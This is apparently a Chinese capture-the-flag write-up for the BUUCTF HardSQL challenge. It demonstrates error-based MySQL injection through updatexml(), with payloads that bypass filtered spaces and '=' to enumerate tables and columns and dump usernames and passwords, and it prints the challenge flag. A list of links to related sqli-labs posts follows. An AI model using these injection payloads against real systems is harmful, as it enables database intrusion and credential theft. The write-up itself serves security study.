BUUCTF----[极客大挑战 2019]HardSQL

输入1'

单引号闭合

进行永真式判断

复制代码
竟然说我是臭弟弟----八嘎(肯定是进行了过滤)
经过手法判断,过滤了=,空格,and等

报错注入updatexml()

复制代码
报错注入顾名思义就是,通过特殊函数错误使用并使其输出错误结果来获取信息的

UPDATEXML() 是 MySQL 数据库中的一个函数,它用于修改 XML 文档中的值。这个函数返回修改后的 XML 文档,并可以根据指定的 XPath 表达式和新的值来更新 XML 文档中的特定部分。

UPDATEXML() 函数的语法如下:

UPDATEXML(xml_doc, xpath_expr, new_value)
xml_doc:要修改的 XML 文档。
xpath_expr:用于定位要修改的 XML 文档部分的 XPath 表达式。
new_value:要插入到 XML 文档中的新值。

查库

复制代码
空格用()绕过
=用like绕过

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

查表

复制代码
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

查字段

复制代码
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
复制代码
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'--',password))from(H4rDsq1)),0x7e),1))#

只出现一半的flag,使用leftright函数,进行一半一半的查询

复制代码
1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))#
复制代码
1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#

拼接得到完整的flag

复制代码
flag{b999a4be-8147-468b-8eba-360a077eaef0}
相关推荐
mooyuan天天12 天前
sqli-labs靶场安装与使用指导教程(3种方法:通用版、php7版、Docker版)
web安全·sql注入·数据库安全·sql注入漏洞·sqli-labs·sqli-labs靶场
Demonsong_21 天前
在职老D渗透日记day19:sqli-labs靶场通关(第26a关)get布尔盲注 过滤or和and基础上又过滤了空格和注释符 ‘)闭合
sql注入
菜根Sec24 天前
Sqli-labs靶场搭建及报错处理
web安全·网络安全·渗透测试·sql注入·网络安全靶场
16年上任的CTO1 个月前
常见网络攻击类型及防护手段
网络攻击模型·ddos·xss·sql注入·网络防护·xsrf·arf
看天走路吃雪糕1 个月前
sqli-labs:Less-28a关卡详细解析
select·sql注入·union·联合查询注入·sqli-labs·less-28a
看天走路吃雪糕1 个月前
sqli-labs:Less-24关卡详细解析
sql注入·sqli-labs·less-24·二次排序注入
看天走路吃雪糕1 个月前
sqli-labs:Less-23关卡详细解析
sql注入·sqli-labs·报错盲注·less-23·注释符
看天走路吃雪糕1 个月前
sqli-labs:Less-26关卡详细解析
sql注入·sqli-labs·报错盲注·or·less-26·and
看天走路吃雪糕1 个月前
sqli-labs:Less-21关卡详细解析
sql注入·cookie·sqli-labs·报错盲注·less-21
看天走路吃雪糕1 个月前
sqli-labs:Less-20关卡详细解析
sql注入·cookie·sqli-labs·报错盲注·less-20